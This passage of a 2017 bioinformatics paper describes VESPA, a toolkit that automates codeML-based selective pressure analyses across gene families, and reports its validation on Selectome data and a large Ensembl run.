methods is codeML from the PAML software package (Yang, 2007). The strength of this approach is the application of flexible codon-based models capable of assessing variation in selective pressures at two levels: (i) across sites in an alignment and (ii) across sites in a predefined, or ‘‘foreground’’ lineage on a phylogenetic tree (Yang & Dos Reis, 2011). Operating codeML requires a complex file structure to compute the parameters under multiple nested models. Associated likelihood ratio tests (LRTs) must also be performed in the identification of the model of best fit. These complexities are often compounded by the size of study, which increasingly are genomic in scale (Liu et al., 2014; Keane et al., 2015; Webb et al., 2015). Other approaches to streamline the process of applying codon-based models of evolution to homologous sequences sets focus on site-specific models such as POTION (Hongo et al., 2015). To address these issues we have designed VESPA (Very large-scale Evolutionary and Selective Pressure Analyses). VESPA automates selective pressure analyses and associated prerequisite analyses and post-analysis summary statistics. VESPA can perform both lineage-site specific and site-specific analyses whereas POTION presently performs the site-specific analyses. Therefore, VESPA is unique in its capacity to perform the complex set of tasks involved in assessing lineage specific selective pressure variation across homologous gene families and across lineages. VESPA minimizes the majority of data manipulation requirements for standard molecular evolutionary analyses and also automatically implements and analyzes selective pressure variation analyses using codeML (Yang, 2007). In addition, VESPA supplies an assessment of potential false positives and produces summary files of the results that are easy to interpret. VESPA allows the user to take advantage of the wealth of publically available genomic data from model and non-model organisms to perform large-scale analyses of homology searching, alignment, phylogeny reconstruction and selective pressure variation. All that VESPA requires is the protein coding DNA sequences, which it will translate with the standard genetic code and use to search and construct gene family alignments. This flexible toolkit can permit large-scale analyses to be performed in an efficient manner and with fewer errors. Webb et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.118 2/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.118 Table 1 Overview of the 5 Phases in the VESPA software package. Phase Purpose Supported input type Supported file formats 1 Data preparation Protein coding DNA sequencesa FASTA 2 Homology searching BLAST/HMMER output files BLAST tabular, HMMER standard 3 Alignment assessment and phylogeny reconstruction Multiple sequence alignmentsa FASTA, NEXUS, PHYLIP 4 Selective pressure analysis preparation Gene phylogenies (or species phylogenies) with corresponding Multiple sequence alignmentsa Trees: Newick, NEXUS; Alignments: See above 5 Selective pressure analysis assessment Standard codeML output files generated directly by the software VESPA formatted codeML output Notes. aIndicates phases of VESPA that incorporate third-party programs. The file formats required as input for each phase of VESPA are detailed. The numbering scheme is consistent with the num- bering scheme for the phases as displayed in Figs. 1 and 2. METHODS VESPA helps automation by preparing input data files and processing results but program executions are initiated by the user (e.g., via submission to an HPC queuing system. VESPA has five major phases (Table 1 and Fig. 1), each of which is composed of a number of functions. VESPA was developed as a toolkit of various independent functions within each phase and the primary goal is to simplify the procedures involved in large-scale selective pressure variation analyses. Each function either completes a specific phase of the analysis (e.g., homologous gene identification) or facilitates/automates the use of third-party software packages to complete more specialized procedures. The majority of functions are written in Python 2.7 and are designed to operate on a UNIX command-line. Functions are categorized as either basic or advanced, e.g., the function to identify single gene orthologs is a basic function whereas confirming both SGOs and multi-gene families (MGFs) is an advanced function (Fig. 2). This structure also provides users with a flexible and adaptable framework for more specialist tasks. For in-depth description and format requirements, please see the program manual, tutorials and documentation published on the program website (http://www.mol-evol.org/VESPA). Depending on the phase of VESPA, input is accepted from any program capable of producing the supported file format(s) or a selected collection of third-party programs (Table 1). For example, Phase 2 (the homology searching phase) currently parses the output of BLAST (Altschul et al., 1997) or HMMER (Eddy, 1998), whereas the alignment assessment and phylogeny reconstruction phase is limited only by file format requirements (e.g., FASTA, NEXUS, PHYLIP). Functions in VESPA are invoked following the program call (i.e., vespa.py) along with arguments to indicate the phase-relevant input data and function-specific optional arguments. Depending on the function, optional arguments enable users to modify parameter values (e.g., BLAST search thresholds, phylogenetic reconstruction settings) or alter command-specific settings. Webb et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.118 3/16 https://peerj.com http://www.mol-evol.org/VESPA http://dx.doi.org/10.7717/peerj-cs.118 Figure 1 Overview of the 5 Phases implemented in VESPA. The five phases of VESPA are listed from ‘‘Data Preparation’’ to ‘‘Selective Pressure Analysis Assessment’’. Underneath each is a grey box enclosing some representative commands from that phase. Each phase concludes with a black box indicating the use of a third-party program to perform the necessary task (e.g., sequence alignment or phylogenetic recon- struction). The output of the first four phases is then used as the input of the next phase. The final phase is written in Perl and concludes with the creation of summary files that contain all the relevant information from the selective pressure analyses. Webb et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.118 4/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.118 Figure 2 Overview of the options available in the VESPA package. An overview of the basic and ad- vanced analysis options at each of the five phases of VESPA. The functions of each phase are shown as white boxes, and are invoked in the order shown (Note: that not all functions are shown here; a complete set of VESPA functions are available in the manual). Within each phase the available alternatives for pro- cessing the data are given on the left and right hand columns. These only vary for Phase 3 and 4. The left most column may represent the processing of single gene orthologs that you wish to impose the species tree onto. If this is the case then VESPA will allow you to generate the phylogenies from the species tree (as shown on the left most side of (C)). (continued on next page...) Webb et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.118 5/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.118 Figure 2 (...continued) However, you may wish to generate gene trees directly from the data for either multigene families or for single gene families of uncertain orthology (this option is shown on the right most column in (C) and in- volves selecting the substitution model of best fit and reconstructing the phylogeny). In addition to the functions, the input and output of each phase are shown in dark grey boxes and if a third-party program is required to analyze the output of the phase, the program is specified below the phase in a light grey box. For three of the five phases (data preparation, homology searching, and selective pressure analysis assess- ment) the functions invoked in both the basic and advanced options are identical. The primary difference between the analyses (basic/advanced) is found in the alignment assessment and phylogeny reconstruction phase. The advanced option uses ProtTest (Darriba et al., 2011) for substitution model selection and Mr- Bayes (Ronquist & Huelsenbeck, 2003) for phylogenetic reconstruction. Beyond this major difference, the selective pressure analysis preparation simply requires a function to import the output of MrBayes. Functions in VESPA complete by producing the relevant output files without modifying the original input files. While this design results in the generation of a number of intermediate files (especially in the later stages of selection analysis), it enables users to easily keep track of all data modifications. Each phase of VESPA’s analysis produces the necessary data files for conducting a specialized analysis using third-party software (Fig. 1). Homology searches in particular are not fully automated by VESPA for two reasons: (i) they are best run as individual serial tasks on large high-end computing clusters, or (ii) the submission processes differ across compute clusters. However, VESPA can generate the BLAST formatted database for subsequent homology searches. All VESPA commands are issued on the command line and are readily executable via a cluster scheduling system. RESULTS As detailed above, VESPA incorporates two analyses, a basic analysis for analyzing SGOs and an advanced analysis for analyzing both SGOs and MGFs (Fig. 2). Here we provide an example of an application of the basic analysis using ten genes from eleven species as a small test dataset. As seen in Fig. 2, the process begins with the user supplying transcript data for the data preparation phase. The first phase begins with the clean function, a basic quality control (QC) filtering step, followed by translate, to translate the filtered transcripts. VESPA then proceeds to the make_database function to create a sequence database for homology searching with either BLAST (Altschul et al., 1997) or HMMER3 (Eddy, 1998). Upon completion of homology searching, the function reciprocal_groups is used to identify proteins that share reciprocal similarity. Then, files containing these families of sequences are produced. This function is highly configurable by optional arguments so that users can evaluate various different similarity scenarios (i.e., different e-value cutoffs) with only a single output file. The produced sequences files are then aligned using any multiple sequence alignment (MSA) method that can produce a supported file format (e.g., programs such as MUSCLE (Edgar, 2004) and PRANK (Loytynoja & Goldman, 2005) are supported). It is advisable to explore a variety of MSA methods for every gene family (Muller et al., 2010), and VESPA facilitates this the user to compare these different approaches. The metal_compare function (within the Alignment Assessment and Phylogeny Reconstruction phase) in VESPA allows alignment approaches to be compared and a single MSA of Webb et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.118 6/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.118 best fit is retained for each gene family (i.e., Gene Family A may have an MSA from MUSCLE while Gene Family B may have an MSA from PRANK). MSAs for each SGO family can then used in combination with the user-defined species phylogeny to create gene phylogenies using the function infer_genetrees or gene trees can be generated directly from the MSAs The MSAs and gene phylogenies are then used for the selective pressure analysis preparation phase. The function create_branch can be used to specifically label internal nodes as ancestral lineages that the user may wish to explore. The MSAs and gene phylogenies are then used by the function setup_codeml to automatically create the complex codeML file structure and a task file for automating codeML (Yang, 2007). Upon completion of codeML the codeml_reader function is used to automate the interpretation of the results and producing summary files of the results. VESPA creates a number of output files for each homologous gene family detailing the results of the codeML analysis. There are two primary types of output files for each gene family tested: (1) a single csv formatted summary text file (shown in Table 2) for one gene family, and (2), a multiple sequence alignment for each model tested detailing the sites (protein/codon) proposed to be under positive selection (this is also provided in html format so it can be viewed with colour coding for ease of interpretation). To compare the results of VESPA to other pipelines and predictions of positive selection, we used a dataset of 18 gene families from the Selectome database (Moretti et al., 2014). A tarball of the data and results of the VESPA analysis of 18 gene families (i.e., input sequences, alignments, trees, codeml output, VESPA summary at each phase) have been provided in File S1. Selectome is a publicly available database of genes under positive selection. It was chosen to provide this benchmark dataset as it permits direct access to all relevant files used in its calculations, and it also uses the codon based models of evolution implemented in codeML and integrated in VESPA facilitating a direct comparison of results. We carried out two tests with the dataset from Selectome (Release 6) (Moretti et al., 2014). Firstly we wished to assess if the way in which VESPA automatically sets up all codon models, labeling of foreground lineages and LRTs produced comparable results with those from the Selectome pipeline. To this end, we ran VESPA using the masked DNA alignments and gene trees for each of the 18 homologous gene families from the Selectome database. VESPA produced identical results for these input alignments. This demonstrates that VESPA’s automation of the process is reliable and robust. One challenge in performing these analyses is that different alignment methods applied to the same gene families can produce different results. VESPA provides the ‘‘metal_compare’’ function, which allows alignments for a gene family to be compared. To highlight its utility, we performed an additional test on this dataset of 18 homologous gene families from Selectome. We used the unmasked sequences and generated a set of alternative alignments through MUSCLE (Edgar, 2004) and PRANK (Loytynoja & Goldman, 2005) and using the metal_compare function of VESPA we identified the best (i.e., most statistically significant) alignment for each gene family. The VESPA functions ‘setup_codeml’ and ‘codeml_reader’ were then used to automate the codeML set up and analysis. The VESPA pipeline was able to replicate the lineages identified as under positive selection in the Selectome database. Webb et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.118 7/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.118#supp-2 http://dx.doi.org/10.7717/peerj-cs.118 Table 2 Sample of a summary output file created by ‘codeml_reader’ in Phase 5 of the VESPA package. Model Tree Model type p W (t =0) lnL LRT result Parameter estimates Positive selection Positively selected sites in 8×45 alignment (P(w > 1) > 0.5) m0 Sample_MSA Homogeneous 1 2 −572.969394 N/A w =0.61924 No m1Neutral Sample_MSA Site-specific 1 2 −568.572319 N/A p0=0.35065 p1=0.64935 w0=0.08403 w1=1.00000 Not allowed m2Selection Sample_MSA Site-specific 2 2 −568.521978 m1Neutral p0=0.37699 p1=0.00000 p2=0.62301 w0=0.10174 w1=1.00000 w2=1.11245 No m3Discrtk2 Sample_MSA Site-specific 3 2 −568.521978 m3Discrtk2 p0=0.37699 p1=0.62301 w0=0.10174 w1=1.11245 Yes Alignment (28 NEB sites): 2 3 4 5 6 8 12 13 15 17 19 20 22 23 24 25 26 27 30 31 32 34 35 39 40 41 43 44 m3Discrtk3 Sample_MSA Site-specific 5 2 −568.521978 m3Discrtk2 p0=0.37699 p1=0.53897 p2=0.08404 w0=0.10174 w1=1.11245 w2=1.11246 No m7 Sample_MSA Site-specific 2 2 −568.764172 N/A p=0.22135 q=0.11441 Not allowed m8 Sample_MSA Site-specific 4 2 −568.526486 m7, m8 p=11.60971 p0=0.37916 p1=0.62084 q=99.00000 w =1.11431 No m8a Sample_MSA Site-specific 4 1 −568.578069 N/A p=9.38528 p0=0.35203 p1=0.64797 q=99.00000 w =1.00000 Not allowed (continued on next page) W ebb etal. (2017),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.118 8/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.118 Table 2 (continued) Model Tree Model type p W (t =0) lnL LRT result Parameter estimates Positive selection Positively selected sites in 8×45 alignment (P(w > 1) > 0.5) modelA Sample_MSA_Primates Lineage-site 3 2 −568.572319 m1Neutral, modelAnll p0=0.35065 p1=0.64935 p2=0.00000 p3=0.00000 w0=0.08403 w1=1.00000 w2=1.00000 No modelAnull Sample_MSA_Primates Lineage-site 3 1 −568.572319 N/A p0=0.35065 p1=0.64935 p2=0.00000 p3=0.00000 w0=0.08403 w1=1.00000 w2=1.00000 modelA Sample_MSA_Chimp Lineage-site 3 2 −557.052657 modelA p0=0.33452 p1=0.59186 p2=0.02659 p3=0.04704 w0=0.1099 w1=1.00000 w2=999.000 Yes Alignment (3 BEB sites): 24 25 32 modelAnull Sample_MSA_Chimp Lineage-site 3 1 −568.572319 N/A p0=0.35065 p1=0.64935 p2=0.00000 p3=0.00000 w0=0.08403 w1=1.0000 w2=1.00000 Not allowed modelA Sample_MSA_Human Lineage-site 3 2 −568.572319 m1Neutral, modelAnull p0=0.35065 p1=0.64935 p2=0.00000 p3=0.00000 w0=0.08403 w1=1.0000 w2=1.00000 No (continued on next page) W ebb etal. (2017),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.118 9/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.118 Table 2 (continued) Model Tree Model type p W (t =0) lnL LRT result Parameter estimates Positive selection Positively selected sites in 8×45 alignment (P(w > 1) > 0.5) modelAnull Sample_MSA_Human Lineage-site 3 1 −568.572319 N/A p0=0.35065 p1=0.64935 p2=0.00000 p3=0.00000 w0=0.08403 w1=1.0000 w2=1.00000 No Notes. The following information is provided for each model tested: the lineage (internal or terminal branches) tested as foreground; the type of model (i.e. site-specific or branch-specific) being tested; number of free parameters in the ÏĽ distribution that are estimate by codeML, the initial ÏĽ value used by codeML (each run within VESPA has multiple starting values to minimise the risk of reporting from a lo- cal minimum on the likelihood plane); the resulting log likelihood (lnL) of the analysis; the resulting model of the likelihood ratio test (LRT); the parameter estimates of codeML; if positive selection was detected (yes/no); and the alignment coordinates for any positively selected sites. NEB, NaÃŕve Empirical Bayes estimate and BEB, Bayes Empirical Bayes estimate. W ebb etal. (2017),P eerJ C om put.S ci.,D O I10.7717/peerj-cs.118 10/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.118 Table 3 Comparison of the results from 18 gene families from the Selectome database analysed in VESPA. Original masked alignment Alternative alignment Positive selection (ModelA) Positively selected sites Postive selection (ModelA) Positively selected sites ATG16L1 Yes (HPGPoNM) Matched Yes (HPGPoNM , HP*, and HPG*) Matched ATP5SL Yes (HP) Matched Yes (HP) Matched AZGP1 Yes (HPGPoNM) Matched Yes (HPGPoNM) Matched 9/10 (107) C12orf43 Yes (HPG) Matched Yes (HPG) Matched CACNA1I Yes (HP) Matched Yes (HP) Matched 2/3 (1,095) CASP1 Yes (HPG) Matched Yes (HPG) Matched CD151 Yes (HPG) Matched Yes (HPG) Matched COBLL1 Yes (HPGPoN) Matched Yes (HPGPoN) Matched HUS1 Yes (HPGPoNM) Matched Yes (HPGPoNM) Matched IDH3B Yes (HP) Matched Yes (HP) Matched IFIT2 Yes (HPGPoNM) Matched Yes (HPGPoNM) Matched INTS7 Yes (HPGPoNM) Matched Yes (HPGPoNM) Matched ODC1 Yes (HPGPoN) Matched Yes (HPGPoN) Matched PASK Yes (HP) Matched Yes (HP) Matched 2/3 (434) RRP8 Yes (HPGPoN) Matched Yes (HPGPoN) Matched RTP2 Yes (HP) Matched Yes (HP) Matched SLC8A1 Yes (PG) Matched Yes (PG) Matched TRIM40 Yes (HPGPo) Matched Yes (HPGPo) Matched 2/4 (140, 256) Notes. *False positives. The 18 homologous families chosen from the Selectome database are given their HUGO identifier on the left. The results of analysis in VESPA as compared to Selectome re- sults using the same masked alignments are shown in columns 2 and 3. The results from VESPA using the alternative alignment method as compared to the original alignments is shown in columns 4 and 5. For both alignments (original and alternative) it is indicated if ModelA positive selection is identified in the same lineages, and if the sites identi- fied as positively selected match. Using the alternative alignments, four cases where the sites identified as positively selected did not completely match the position in the original alignment are indicated in parenthesis. The extant lineages with evidence of positive selection throughout are shown in parentheses and are abbreviated as follows: Human (H), Chimp (P), Gorilla (G), Orangutan (Po), Gibbon (N) and Macaque (M). Ancestral nodes are denoted as a combination of the abbreviations for the extant lineages that the node includes, e.g. the ancestral node joining Human (H) and Chimp (P) is denoted as HP. However, the results presented in Table 3 include small differences in the number and position of sites identified as positively selected. The ATP5SL alternative alignment was found to have evidence of positive selection on two additional branches as compared to the original result, however, closer inspection of the alternative alignments found the additional branches to be false positives due to a poorly aligned segment of the MSA. Other slight variations in results between the original and alternative alignments included three instances where gene families (C12orf43, CACNA1I, and PASK) had a difference of one positively selected site and one instance (TRIM40) of differences in two positively selected sites reported in the original alignment that was not reported in the alternative alignment for the same family. Finally, a single gene (SLC8A1) contained additional sites under positive selection following VESPA analysis using the alternative alignments, it should be noted that these sites are within a poorly conserved span of the protein. The remaining 13 genes were found to replicate the positively selected sites reported in Selectome. To demonstrate the application of VESPA to very large datasets we have assembled a novel dataset of 7,918 homologous gene families (each containing ≥ 8 sequences) from the ENSEMBL 2016 genome database (release 82) (Yates et al., 2016). Using the VESPA Webb et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.118 11/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.118 ‘‘clean_ensembl’’ command we: (1) restricted the protein coding sequences per genome to the longest transcript for each gene, and (2) logged and discarded sequences containing internal stop codons or incomplete codons. Multiple sequence alignments were made for all gene families identified and phylogenies for each homologous gene families were inferred by VESPA from the topology of the Ensembl Compara species tree demonstrating the flexibility of the VESPA package (Phase 3). Finally, the selective pressure analyses were carried out in VESPA Phase 5 with human and then mouse labeled as the foreground lineages of interest. Of the 7,918 genes analyzed by VESPA 1998 showed evidence of site-specific positive selection (model ‘‘m8’’), 223 genes showed evidence of mouse-specific positive selection (‘‘model A’’), and finally 80 showed evidence of human-specific positive selection (‘‘model A’’); File S1 contains the full set of results. For the dataset of 7,918 homologous gene families the majority of VESPA functions completed in under four minutes (on the following system: Intel Xeon CPU E5420 (2.50 GHz), 16 GB RAM, using Ubuntu OS 16.04). The exceptions were the ’codeml_setup’ function which took approximately 45 min for this dataset, this function is slightly slower as it is creating the complex directory/file structure for codeML. The second exception was the ’codeml reader’ function which took approximately 6 h (this function is to analyze the large number of files created by codeML and produce the output and summary files). The codeML component of the analyses took 36,180 CPU hours in total to complete. (Note: these time estimates are not inclusive of Phase 2—homology search). DISCUSSION One of the primary goals of VESPA is to simplify and streamline basic comparative genomic procedures such as filtering poor quality protein coding sequences and generating the most appropriate alignment for each gene family. VESPA also simplifies and streamlines codeML-based selective pressure analyses. From our analysis of 7,918 homologous gene families we found that the majority of tasks could be completed within minutes using VESPA. However, the codeML-related functions for creating the input file structure and examining the output files takes considerably longer to complete. As these functions are an essential aspect of the pipeline, decreasing their execution time will be a primary goal in future updates to VESPA. Two possible approaches that will be explored are: (i) increasing the overall efficiency of the functions and (ii) developing a version of VESPA capable running these scripts (and possibly others) in parallel on multi-core processors. The modular nature of VESPA enables the pipeline (or specific functions) to be used in conjunction with existing workflow systems. The only requirements would be having the necessary data (MSAs, protein-coding transcripts, etc.) in a supported format. For example, VESPA could be used to perform a selective pressure analysis on protein-coding transcripts obtained from RNA-Seq. Also, it is possible to skip specific stages of the VESPA pipeline for a preferred approach/software package, e.g., it is possible to use an alternative approach for phylogenetic reconstruction and employ the resulting tree in a VESPA analysis. It should also be possible to integrate the majority of VESPA’s functions (with the exception of the built-in tree pruning function) into workflow systems such as GALAXY (Afgan et Webb et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.118 12/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.118#supp-2 http://dx.doi.org/10.7717/peerj-cs.118 al., 2016). This would allow VESPA to operate in conjunction with the scripts and tools already available on GALAXY, enabling greater freedom for the user. This integration will be implemented in future releases of VESPA. We also employed VESPA in the analysis of 18 gene families from the Selectome database (Moretti et al., 2014). Our initial comparison used both the alignment (masked) and tree provided by Selectome. VESPA was able to confirm the findings reported within the database. Secondly, we re-aligned the 18 gene families using two methods (MUSCLE and PRANK) and then again performed the selective pressure analysis using VESPA. The analysis of these alternative alignments revealed minor differences in the reported positively selected sites of five genes (C12orf43, CACNA1I, PASK, SLC8A1, and TRIM40). These differences illustrate that the input alignment may have an impact on the genes and sites identified as positively selected as in Blackburne & Whelan, (2013). To avoid biased results due to choice of alignment method and we highly recommend the use of the ‘‘metal_compare’’ function or programs such as AQUA (Muller et al., 2010) to select the best alignment for each gene family. CONCLUSION VESPA provides a flexible software package designed to simplify large-scale comparative genomic analyses and specifically selective pressure variation analysis implemented in codeML (Yang, 2007). VESPA automates the entire comparative genomic process from data quality checks and homology searching to phylogeny reconstruction and selective pressure analyses, and it produces simple summary files for the user. VESPA offers users various functions that automate many of the required prerequisite analyses and removes error-prone data manipulation steps. Lastly, it is important to note that the processes implemented in the 5 Phases of VESPA facilitates those working on de novo sequence data or non-model organisms to perform large-scale comparative genomic analyses without having pre-processed gene families. All that is required by VESPA is that the protein coding DNA sequences are available. ACKNOWLEDGEMENTS We would also like to thank Louisse Mirabueno (funded by the Wellcome Trust Vacation Scholarship programme) and other members of the community for their help in trouble- shooting, testing and providing feedback on the VESPA software package and associated manual and tutorials. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was undertaken on MARC1, part of the High Performance Computing facilities at the University of Leeds. The research was supported by Science Foundation Ireland Research Frontiers Programme grant (SFI RFP EOB2673) to MJO’C, and DCU Pierse Trust Award and SoBT awards (to TAW and MJO’C) and the University of Leeds 250 Webb et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.118 13/16 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.118 Great Minds Academic Fellowship to MJO’C. The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Science Foundation Ireland Research Frontiers Programme: SFI RFP EOB2673. Competing Interests The authors have no competing interests. Author Contributions • Andrew E. Webb performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • Thomas A. Walsh performed the experiments, contributed reagents/materials/analysis tools, wrote the paper, performed the computation work, reviewed drafts of the paper. • Mary J. O’Connell conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. Data Availability The following information was supplied regarding data availability: GitHub: https://github.com/aewebb80/VESPA. Supplementary File 1 (GitHub): https://github.com/aewebb80/VESPA/blob/master/SupplementaryFile1.tar.bz2. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.118#supplemental-information. REFERENCES Afgan E, Baker D, van den Beek M, Blankenberg D, Bouvier D, Čech M, Chilton J, Clements D, Coraor N, Eberhard C, Grüning B, Guerler A, Hillman-Jackson J, Von Kuster G, Rasche E, Soranzo N, Turaga N, Taylor J, Nekrutenko A, Goecks J. 2016. The Galaxy platform for accessible, reproducible and collaborative biomedical analy- ses: 2016 update. Nucleic Acids Research 44(W1):W3–W10 DOI 10.1093/nar/gkw343. Altschul SF, Madden TL, Schaffer AA, Zhang J, Zhang Z, Miller W, Lipman DJ. 1997. Gapped BLAST and PSI-BLAST: a new generation of protein database search programs. Nucleic Acids Research 25(17):3389–3402 DOI 10.1093/nar/25.17.3389. Alvarez-Ponce D, Aguade M, Rozas J. 2009. Network-level molecular evolutionary analysis of the insulin/TOR signal transduction pathway across 12 Drosophila genomes. Genome Research 19(2):234–242 DOI 10.1101/gr.084038.108. Webb et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.118 14/16 https://peerj.com https://github.com/aewebb80/VESPA https://github.com/aewebb80/VESPA/blob/master/SupplementaryFile1.tar.bz2 http://dx.doi.org/10.7717/peerj-cs.118#supplemental-information http://dx.doi.org/10.7717/peerj-cs.118#supplemental-information http://dx.doi.org/10.1093/nar/gkw343 http://dx.doi.org/10.1093/nar/25.17.3389 http://dx.doi.org/10.1101/gr.084038.108 http://dx.doi.org/10.7717/peerj-cs.118 Blackburne BP, Whelan S. 2013. Class of multiple sequence alignment algorithm affects genomic analysis. Molecular Biology and Evolution 30(3):642–653 DOI 10.1093/molbev/mss256. Darriba D, Taboada GL, Doallo R, Posada D. 2011. ProtTest 3: fast selection of best-fit models of protein evolution. Bioinformatics 27(8):1164–1165 DOI 10.1093/bioinformatics/btr088. Delport W, Poon AF, Frost SD, Kosakovsky Pond SL. 2010. Datamonkey 2010: a suite of phylogenetic analysis tools for evolutionary biology. Bioinformatics 26(19):2455–2457 DOI 10.1093/bioinformatics/btq429. Eddy SR. 1998. Profile hidden Markov models. Bioinformatics 14(9):755–763 DOI 10.1093/bioinformatics/14.9.755. Edgar RC. 2004. MUSCLE: a multiple sequence alignment method with reduced time and space complexity. BMC Bioinformatics 5:113 DOI 10.1186/1471-2105-5-113. Hongo JA, De Castro GM, Cintra LC, Zerlotini A, Lobo FP. 2015. POTION: an end- to-end pipeline for positive Darwinian selection detection in genome-scale data through phylogenetic comparison of protein-coding genes. BMC Genomics 16:567 DOI 10.1186/s12864-015-1765-0. Keane M, Semeiks J, Webb AE, Li YI, Quesada V, Craig T, Madsen LB, Van Dam S, Brawand D, Marques PI, Michalak P, Kang L, Bhak J, Yim HS, Grishin NV, Nielsen NH, Heide-Jorgensen MP, Oziolor EM, Matson CW, Church GM, Stuart GW, Patton JC, George JC, Suydam R, Larsen K, Lopez-Otin C, O’Connell MJ, Bickham JW, Thomsen B, De Magalhaes JP. 2015. Insights into the evolu- tion of longevity from the bowhead whale genome. Cell Reports 10(1):112–122 DOI 10.1016/j.celrep.2014.12.008. Kim PM, Korbel JO, Gerstein MB. 2007. Positive selection at the protein network periphery: evaluation in terms of structural constraints and cellular context. Proceedings of the National Academy of Sciences of the United States of America 104(51):20274–20279 DOI 10.1073/pnas.0710183104. Kosiol C, Vinar T, Da Fonseca RR, Hubisz MJ, Bustamante CD, Nielsen R, Siepel A. 2008. Patterns of positive selection in six Mammalian genomes. PLOS Genetics 4(8):e1000144 DOI 10.1371/journal.pgen.1000144. Liu S, Lorenzen ED, Fumagalli M, Li B, Harris K, Xiong Z, Zhou L, Korneliussen TS, Somel M, Babbitt C, Wray G, Li J, He W, Wang Z, Fu W, Xiang X, Morgan CC, Doherty A, O’Connell MJ, McInerney JO, Born EW, Dalen L, Dietz R, Orlando L, Sonne C, Zhang G, Nielsen R, Willerslev E, Wang J. 2014. Population genomics reveal recent speciation and rapid evolutionary adaptation in polar bears. Cell 157(4):785–794 DOI 10.1016/j.cell.2014.03.054. Loughran NB, Hinde S, McCormick-Hill S, Leidal KG, Bloomberg S, Loughran ST, O’Connor B, O’Fagain C, Nauseef WA, O’Connell MJ. 2012. Functional consequence of positive selection revealed through rational mutagenesis of human myeloperoxidase. Molecular Biology and Evolution 29(8):2039–2046 DOI 10.1093/molbev/mss073. Webb et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.118 15/16 https://peerj.com http://dx.doi.org/10.1093/molbev/mss256 http://dx.doi.org/10.1093/bioinformatics/btr088 http://dx.doi.org/10.1093/bioinformatics/btq429 http://dx.doi.org/10.1093/bioinformatics/14.9.755 http://dx.doi.org/10.1186/1471-2105-5-113 http://dx.doi.org/10.1186/s12864-015-1765-0 http://dx.doi.org/10.1016/j.celrep.2014.12.008 http://dx.doi.org/10.1073/pnas.0710183104 http://dx.doi.org/10.1371/journal.pgen.1000144 http://dx.doi.org/10.1016/j.cell.2014.03.054 http://dx.doi.org/10.1093/molbev/mss073 http://dx.doi.org/10.7717/peerj-cs.118 Loytynoja A, Goldman N. 2005. An algorithm for progressive multiple alignment of sequences with insertions. Proceedings of the National Academy of Sciences of the United States of America 102(30):10557–10562 DOI 10.1073/pnas.0409137102. Moretti S, Laurenczy B, Gharib WH, Castella B, Kuzniar A, Schabauer H, Studer RA, Valle M, Salamin N, Stockinger H, Robinson-Rechavi M. 2014. Selectome update: quality control and computational improvements to a database of positive selection. Nucleic Acids Research 42(Database issue):D917–D921 DOI 10.1093/nar/gkt1065. Muller J, Creevey CJ, Thompson JD, Arendt D, Bork P. 2010. AQUA: automated quality improvement for multiple sequence alignments. Bioinformatics 26(2):263–265 DOI 10.1093/bioinformatics/btp651. Pond SL, Frost SD, Muse SV. 2005. HyPhy: hypothesis testing using phylogenies. Bioinformatics 21(5):676–679 DOI 10.1093/bioinformatics/bti079. Ronquist F, Huelsenbeck JP. 2003. MrBayes 3: bayesian phylogenetic inference under mixed models. Bioinformatics 19(12):1572–1574. DOI 10.1093/bioinformatics/btg180. Swanson WJ, Yang Z, Wolfner MF, Aquadro CF. 2001. Positive Darwinian selection drives the evolution of several female reproductive proteins in mammals. Proceedings of the National Academy of Sciences of the United States of America 98(5):2509–2514 DOI 10.1073/pnas.051605998. Webb AE, Gerek ZN, Morgan CC, Walsh TA, Loscher CE, Edwards SV, O’Connell MJ. 2015. Adaptive evolution as a predictor of species-specific innate immune response. Molecular Biology and Evolution 32(7):1717–1729 DOI 10.1093/molbev/msv051. Yang Z. 2007. PAML 4: phylogenetic analysis by maximum likelihood. Molecular Biology and Evolution 24(8):1586–1591 DOI 10.1093/molbev/msm088. Yang Z, Dos Reis M. 2011. Statistical properties of the branch-site test of positive selec- tion. Molecular Biology and Evolution 28(3):1217–1228 DOI 10.1093/molbev/msq303. Yates A, Akanni W, Amode MR, Barrell D, Billis K, Carvalho-Silva D, Cummins C, Clapham P, Fitzgerald S, Gil L, Giron CG, Gordon L, Hourlier T, Hunt SE, Janacek SH, Johnson N, Juettemann T, Keenan S, Lavidas I, Martin FJ, Maurel T, McLaren W, Murphy DN, Nag R, Nuhn M, Parker A, Patricio M, Pignatelli M, Rahtz M, Riat HS, Sheppard D, Taylor K, Thormann A, Vullo A, Wilder SP, Zadissa A, Birney E, Harrow J, Muffato M, Perry E, Ruffier M, Spudich G, Trevanion SJ, Cunningham F, Aken BL, Zerbino DR, Flicek P. 2016. Ensembl 2016. 